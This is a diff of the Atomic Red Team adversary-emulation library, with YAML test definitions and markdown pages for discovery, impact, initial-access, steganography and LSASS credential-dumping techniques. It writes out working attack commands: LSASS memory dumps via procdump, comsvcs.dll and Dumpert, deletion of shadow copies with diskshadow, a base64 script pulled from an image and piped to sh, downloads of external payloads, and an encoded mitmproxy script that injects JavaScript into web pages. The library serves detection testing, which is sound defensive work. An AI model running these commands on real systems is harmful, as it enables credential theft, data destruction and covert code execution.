name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
T1040:
technique:
type: attack-pattern
@@ -86308,20 +85394,20 @@ discovery:
description: |
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
supported_platforms:
- windows
executor:
command: |
netstat -ano
netstat
net use
net sessions 2>nul
net sessions
name: command_prompt
- name: System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
description: |
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
supported_platforms:
- windows
@@ -86330,27 +85416,6 @@ discovery:
'
name: powershell
- name: System Network Connections Discovery via PowerShell (Process Mapping)
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
description: 'Enumerate TCP connections and map to owning process names via
PowerShell.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
- name: System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
description: "Get a listing of network connections, domains, domain users, and
@@ -96486,29 +95551,7 @@ impact:
x_mitre_impact_type:
- Availability
identifier: T1496
atomic_tests:
- name: Windows - Simulate CPU Load with PowerShell
auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
description: |
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
Spawns background jobs to stress CPU cores for a specified duration.
supported_platforms:
- windows
input_arguments:
duration_seconds:
description: Duration in seconds to run the CPU stress test
type: integer
default: 30
cpu_threads:
description: Number of threads to stress (default 4)
type: integer
default: 4
executor:
command: |
$end = (Get-Date).AddSeconds(#{duration_seconds})
1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
Get-Job | Wait-Job | Remove-Job
name: powershell
atomic_tests: []
T1565.002:
technique:
type: attack-pattern
@@ -97163,35 +96206,6 @@ impact:
cleanup_command: 'sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
'
- name: Windows - Delete Volume Shadow Copies via Diskshadow
auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
technique is used by numerous ransomware families such as Crytox. The binary
is present by default in Windows Server operating systems (since Windows Server
2008). Upon execution, it will delete all shadow copies of the server.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
'
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
'
get_prereq_command: 'vssadmin.exe create shadow /for=c:
'
executor:
command: '"delete shadows all" | diskshadow.exe
'
name: powershell
elevation_required: true
T1561.001:
technique:
type: attack-pattern
@@ -98439,66 +97453,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
atomics/T1001.002/T1001.002.md
+74 -60
View File
@@ -1,19 +1,23 @@
# T1001.002 - Data Obfuscation via Steganography
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
<blockquote>
## Description from ATT&CK
Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
> Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
[Source](https://attack.mitre.org/techniques/T1001/002)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Steganographic Tarball Embedding](#atomic-test-1-steganographic-tarball-embedding)
- [Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2-embedded-script-in-image-execution-via-extract-invoke-psimage)
- [Atomic Test #3: Execute Embedded Script in Image via Steganography](#atomic-test-3-execute-embedded-script-in-image-via-steganography)
- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
### Atomic Test #1: Steganographic Tarball Embedding
- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
- [Atomic Test #3 - Execute Embedded Script in Image via Steganography](#atomic-test-3---execute-embedded-script-in-image-via-steganography)
<br/>
## Atomic Test #1 - Steganographic Tarball Embedding
This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
@@ -27,10 +31,14 @@ By embedding the tarball file within the image, adversaries can obscure their ac
**Supported Platforms:** Windows
**auto_generated_guid:** `c7921449-8b62-4c4d-8a83-d9281ac0190b`
#### Inputs
**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
@@ -38,77 +46,70 @@ By embedding the tarball file within the image, adversaries can obscure their ac
| new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
| passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Image file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
```
##### Description: File to hide within tarz file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
$passwords | Out-File -FilePath "#{passwords_file}"
```
##### Description: Tarz file to embed in image must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"
```
### Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage
<br/>
<br/>
## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
@@ -122,16 +123,22 @@ is done to emulate an attackers behaviour in the case they were to execute malwa
**Supported Platforms:** Windows
**auto_generated_guid:** `04bb8e3d-1670-46ab-a3f1-5cee64da29b6`
#### Inputs
**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
| psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cd "PathToAtomicsFolder\ExternalPayloads\"
@@ -150,8 +157,7 @@ $textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore
@@ -159,39 +165,31 @@ Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Image file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
```
##### Description: Extract-Invoke-PSImage must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
@@ -199,30 +197,46 @@ $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
```
### Atomic Test #3: Execute Embedded Script in Image via Steganography
<br/>
<br/>
## Atomic Test #3 - Execute Embedded Script in Image via Steganography
This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
**Supported Platforms:** Linux
**auto_generated_guid:** `4ff61684-ad91-405c-9fbc-048354ff1d07`
#### Inputs
**auto_generated_guid:** 4ff61684-ad91-405c-9fbc-048354ff1d07
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | Shell Script file to be embedded and executed | String | PathToAtomicsFolder/script.sh|
| evil_image | The modified image with embedded script | String | PathToAtomicsFolder/evil_image.jpg|
| image | Image file to be embedded | String | PathToAtomicsFolder/image.jpg|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm "#{evil_image}"
```
<br/>
atomics/T1003.001/T1003.001.md
+329 -199
View File
@@ -1,56 +1,72 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
> Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
>
> As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
>
> For example, on the target host use procdump:
>
> * <code>procdump -ma lsass.exe lsass_dump</code>
>
> Locally, mimikatz can be run using:
>
> * <code>sekurlsa::Minidump lsassdump.dmp</code>
> * <code>sekurlsa::logonPasswords</code>
>
> Built-in Windows tools such as `comsvcs.dll` can also be used:
>
> * <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
>
> Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
>
> Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
>
> The following SSPs can be used to access credentials:
>
> * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
> * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
> * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
> * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
[Source](https://attack.mitre.org/techniques/T1003/001)
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as `comsvcs.dll` can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dump LSASS.exe Memory using ProcDump](#atomic-test-1-dump-lsassexe-memory-using-procdump)
- [Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2-dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3-dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4: Dump LSASS.exe Memory using NanoDump](#atomic-test-4-dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5-dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6: Offline Credential Theft With Mimikatz](#atomic-test-6-offline-credential-theft-with-mimikatz)
- [Atomic Test #7: LSASS read with pypykatz](#atomic-test-7-lsass-read-with-pypykatz)
- [Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8-dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9-create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10: Powershell Mimikatz](#atomic-test-10-powershell-mimikatz)
- [Atomic Test #11: Dump LSASS with createdump.exe from .Net v5](#atomic-test-11-dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12-dump-lsassexe-using-imported-microsoft-dlls)
- [Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13-dump-lsassexe-using-lolbin-rdrleakdiagexe)
- [Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14-dump-lsassexe-memory-through-silent-process-exit)
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
### Atomic Test #1: Dump LSASS.exe Memory using ProcDump
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5](#atomic-test-11---dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
- [Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13---dump-lsassexe-using-lolbin-rdrleakdiagexe)
- [Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14---dump-lsassexe-memory-through-silent-process-exit)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
@@ -60,39 +76,41 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** `0be2230c-9ab3-4ac2-8826-3199b9a0ebf8`
#### Inputs
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
@@ -102,29 +120,47 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
```
### Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** `2536dee2-12fb-459a-8c37-971844fa73be`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
### Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -134,46 +170,53 @@ If you see a message saying \"The system cannot find the path specified.\", try
**Supported Platforms:** Windows
**auto_generated_guid:** `7ae7102c-a099-45c8-b985-4c7a2d05790d`
#### Inputs
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{dumpert_exe}"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
```
### Atomic Test #4: Dump LSASS.exe Memory using NanoDump
<br/>
<br/>
